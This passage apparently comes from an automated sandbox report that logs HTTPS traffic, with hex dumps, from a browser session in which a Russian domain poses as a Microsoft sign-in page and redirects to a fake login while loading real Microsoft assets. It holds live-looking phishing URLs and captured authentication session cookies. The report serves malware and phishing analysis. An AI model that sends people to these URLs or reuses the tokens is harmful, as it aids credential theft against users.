                                                                                                                          Data Ascii: .add(n)),null!=o&&(o=String(o),this._names.has(o)||this._names.add(o)),this._mappings.add({generatedLine:t.line,generatedColumn:t.column,originalLine:null!=r&&r.line,originalColumn:null!=r&&r.column,source:n,name:o})},a.prototype.setSourceContent=function
                                                                                                                          2024-02-02 19:17:50 UTC16383INData Raw: 74 68 29 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 6f 63 65 73 73 65 64 3d 21 30 2c 65 28 29 3b 74 72 79 7b 76 61 72 20 6e 3d 74 68 69 73 2e 70 72 6f 63 65 73 73 6f 72 2e 70 6c 75 67 69 6e 73 5b 74 68 69 73 2e 70 6c 75 67 69 6e 5d 2c 69 3d 74 68 69 73 2e 72 75 6e 28 6e 29 3b 74 68 69 73 2e 70 6c 75 67 69 6e 2b 3d 31 2c 63 28 69 29 3f 69 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 61 73 79 6e 63 54 69 63 6b 28 65 2c 74 29 7d 29 29 5b 22 63 61 74 63 68 22 5d 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 68 61 6e 64 6c 65 45 72 72 6f 72 28 65 2c 6e 29 2c 72 2e 70 72 6f 63 65 73 73 65 64 3d 21 30 2c 74 28 65 29 7d 29 29 3a 74 68 69 73 2e 61 73 79 6e 63 54 69 63 6b 28 65 2c 74 29 7d 63 61 74 63 68 28 6f 29 7b 74 68 69 73 2e 70 72 6f 63 65 73
                                                                                                                          Data Ascii: th)return this.processed=!0,e();try{var n=this.processor.plugins[this.plugin],i=this.run(n);this.plugin+=1,c(i)?i.then((function(){r.asyncTick(e,t)}))["catch"]((function(e){r.handleError(e,n),r.processed=!0,t(e)})):this.asyncTick(e,t)}catch(o){this.proces
                                                                                                                          2024-02-02 19:17:50 UTC16383INData Raw: 74 75 72 6e 20 74 68 69 73 2e 67 65 6e 65 72 61 74 65 4d 61 70 28 29 3b 76 61 72 20 65 3d 22 22 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 74 72 69 6e 67 69 66 79 28 74 68 69 73 2e 72 6f 6f 74 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 2b 3d 74 7d 29 29 2c 5b 65 5d 7d 2c 65 7d 28 29 3b 74 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 2c 65 2e 65 78 70 6f 72 74 73 3d 74 5b 22 64 65 66 61 75 6c 74 22 5d 7d 29 2e 63 61 6c 6c 28 74 68 69 73 2c 72 28 35 32 38 29 2e 42 75 66 66 65 72 29 7d 2c 37 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 62 79 74 65 4c 65 6e 67 74 68 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 63 28 65 29 2c 72 3d 74 5b 30 5d 2c 6e 3d 74 5b 31 5d 3b 72 65 74 75 72 6e 20 33 2a 28
                                                                                                                          Data Ascii: turn this.generateMap();var e="";return this.stringify(this.root,(function(t){e+=t})),[e]},e}();t["default"]=a,e.exports=t["default"]}).call(this,r(528).Buffer)},743:function(e,t,r){"use strict";t.byteLength=function(e){var t=c(e),r=t[0],n=t[1];return 3*(
                                                                                                                          2024-02-02 19:17:50 UTC6INData Raw: 6e 20 74 2e 65 61
                                                                                                                          Data Ascii: n t.ea
                                                                                                                          2024-02-02 19:17:50 UTC16383INData Raw: 63 68 4d 61 70 70 69 6e 67 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 68 29 7b 69 66 28 21 28 6c 3c 65 2e 67 65 6e 65 72 61 74 65 64 4c 69 6e 65 29 29 7b 76 61 72 20 74 3d 28 72 3d 73 5b 75 5d 7c 7c 22 22 29 2e 73 75 62 73 74 72 28 30 2c 65 2e 67 65 6e 65 72 61 74 65 64 43 6f 6c 75 6d 6e 2d 66 29 3b 72 65 74 75 72 6e 20 73 5b 75 5d 3d 72 2e 73 75 62 73 74 72 28 65 2e 67 65 6e 65 72 61 74 65 64 43 6f 6c 75 6d 6e 2d 66 29 2c 66 3d 65 2e 67 65 6e 65 72 61 74 65 64 43 6f 6c 75 6d 6e 2c 70 28 68 2c 74 29 2c 76 6f 69 64 28 68 3d 65 29 7d 70 28 68 2c 63 28 29 29 2c 6c 2b 2b 2c 66 3d 30 7d 66 6f 72 28 3b 6c 3c 65 2e 67 65 6e 65 72 61 74 65 64 4c 69 6e 65 3b 29 6e 2e 61 64 64 28 63 28 29 29 2c 6c 2b 2b 3b 69 66 28 66 3c 65 2e 67 65 6e
                                                                                                                          Data Ascii: chMapping((function(e){if(null!==h){if(!(l<e.generatedLine)){var t=(r=s[u]||"").substr(0,e.generatedColumn-f);return s[u]=r.substr(e.generatedColumn-f),f=e.generatedColumn,p(h,t),void(h=e)}p(h,c()),l++,f=0}for(;l<e.generatedLine;)n.add(c()),l++;if(f<e.gen


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          37192.168.2.1649765172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:50 UTC1634OUTGET /cdn-cgi/challenge-platform/h/b/jsd/r/84f4c6c0cc52672b HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-0b0GHFUjypDPzYyRCP-j910iLVEABaRccpLk36B5zRBtQ3fob97QdMrqXsjTd5l0xaaXKm_REXXPLeGuMeGr-7qB7U4XkFGuAUABRnZJpCMgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Aetvl2btd8aqo8wzaMiV5Hf2kdb_IwSVTXuYe0uiIoKycm_q9g-RAse7WQ2x09SHTppANz6TPXL3R5FlIm2flV7nWh7dn4CXmsH-QoXUY5sWlBYRvTFD7wAAZHOGThUh_jbLwMoU4B1IcbiFQee9HxB3lxm4BtjIgZpVmvHJBF0gAA; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; fpc=Aq_odsI7GDJHm8suSWCV-X8; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=
                                                                                                                          2024-02-02 19:17:50 UTC709INHTTP/1.1 400 Bad Request
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:50 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          cf-chl-out: F0aFG+snTZRgH6PeCxpqhw==$VBxmP5EMo/Ma38xiBm9Vlw==
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DKjKtENBgHbBy7iYrHpYVCtQtinUxGPnFkaU2BJpu4lgsXh9lpswM8Ml7eJVT2v30cNWz960Gxbo1a4JGnzXSmD%2FI5D%2BIDnhOoL76hBvgw%2FgKlxIUbeXc4JsUkMKIULuWyas"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6d038bd4526-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:50 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                          Data Ascii: 7invalid
                                                                                                                          2024-02-02 19:17:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          38192.168.2.1649767172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:50 UTC1928OUTGET / HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Referer: https://galeonconstruction.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-0b0GHFUjypDPzYyRCP-j910iLVEABaRccpLk36B5zRBtQ3fob97QdMrqXsjTd5l0xaaXKm_REXXPLeGuMeGr-7qB7U4XkFGuAUABRnZJpCMgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Aetvl2btd8aqo8wzaMiV5Hf2kdb_IwSVTXuYe0uiIoKycm_q9g-RAse7WQ2x09SHTppANz6TPXL3R5FlIm2flV7nWh7dn4CXmsH-QoXUY5sWlBYRvTFD7wAAZHOGThUh_jbLwMoU4B1IcbiFQee9HxB3lxm4BtjIgZpVmvHJBF0gAA; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; fpc=Aq_odsI7GDJHm8suSWCV-X8; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=
                                                                                                                          2024-02-02 19:17:51 UTC1068INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:51 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: -1
                                                                                                                          Location: https://react.q2zg22.ru/login
                                                                                                                          Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Pragma: no-cache
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+chi"}]}
                                                                                                                          Set-Cookie: fpc=Aq_odsI7GDJHm8suSWCV-X8; Path=/; Expires=Sun, 03 Mar 2024 19:17:51 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: x-ms-gateway-slice=estsfd; Path=/; HttpOnly; Secure; SameSite=None
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Ms-Ests-Server: 2.1.17216.2 - EUS ProdSlices
                                                                                                                          X-Ms-Request-Id: 27d1ec6b-fca3-4a42-8230-27a4b353ca00
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6d18c964576-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:51 UTC301INData Raw: 31 63 65 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 2f 6c 6f 67 69 6e 23 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 73 2f 61 66 63 33 35 66 65 66 62 39 31 36 65 66 34 65 61 61 66 32 66 65 38 35 39 38 33 37 65 37 34 34 61 39 63 32 35 61 36 37 62 36 31 32 34 38 66 36 65 65 39 33 63 36 61 30 32 63 61 37 66 65 30 34 2f 35 32 31 33 39 33 66 66
                                                                                                                          Data Ascii: 1ce<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://react.q2zg22.ru/login#">here</a>.</h2><script type="application/javascript" src="/s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ff
                                                                                                                          2024-02-02 19:17:51 UTC168INData Raw: 33 35 31 34 37 62 34 64 39 61 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 73 2f 61 66 63 33 35 66 65 66 62 39 31 36 65 66 34 65 61 61 66 32 66 65 38 35 39 38 33 37 65 37 34 34 61 39 63 32 35 61 36 37 62 36 31 32 34 38 66 36 65 65 39 33 63 36 61 30 32 63 61 37 66 65 30 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                          Data Ascii: 35147b4d9a.js"></script><script type="application/javascript" src="/s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js"></script></body></html>
                                                                                                                          2024-02-02 19:17:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          39192.168.2.1649766152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:50 UTC406OUTGET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:51 UTC628INHTTP/1.1 200 OK
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 1034387
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: EuPayFgGHQiAI7K9SOL6lg==
                                                                                                                          Content-Type: image/x-icon
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:50 GMT
                                                                                                                          Etag: 0x8D8731240E548EB
                                                                                                                          Last-Modified: Sun, 18 Oct 2020 03:02:30 GMT
                                                                                                                          Server: ECAcc (aga/87AE)
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: 38f7f91a-801e-00d7-3da4-4cbf4e000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 17174
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:51 UTC16383INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                                                                                          Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                                                                                          2024-02-02 19:17:51 UTC791INData Raw: 01 80 00 00 01 80 00 28 00 00 00 18 00 00 00 30 00 00 00 01 00 04 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30
                                                                                                                          Data Ascii: (0"P""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          40192.168.2.1649768152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:50 UTC613OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d513b6f0c9182bbf1e0f.js HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:51 UTC749INHTTP/1.1 200 OK
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 2405912
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: KYJx7/C9nJueI4M4v4G+FA==
                                                                                                                          Content-Type: application/x-javascript
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:51 GMT
                                                                                                                          Etag: 0x8DC0CDF85F19831
                                                                                                                          Last-Modified: Thu, 04 Jan 2024 04:42:14 GMT
                                                                                                                          Server: ECAcc (aga/879A)
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: 91ac929d-701e-00a8-1f2a-40c451000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 15708
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:51 UTC15708INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                          Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          41192.168.2.1649770152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:50 UTC661OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:51 UTC716INHTTP/1.1 200 OK
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 21739554
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: Fm3lNHEmUlOrOkVt7+baIw==
                                                                                                                          Content-Type: image/gif
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:51 GMT
                                                                                                                          Etag: 0x8DB5C3F4982FD30
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                          Server: ECAcc (aga/875B)
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: 0e8418e1-101e-008b-5454-90f28f000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 2672
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:51 UTC2672INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e 69 18 14 00 21
                                                                                                                          Data Ascii: GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~i!


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          42192.168.2.1649769152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
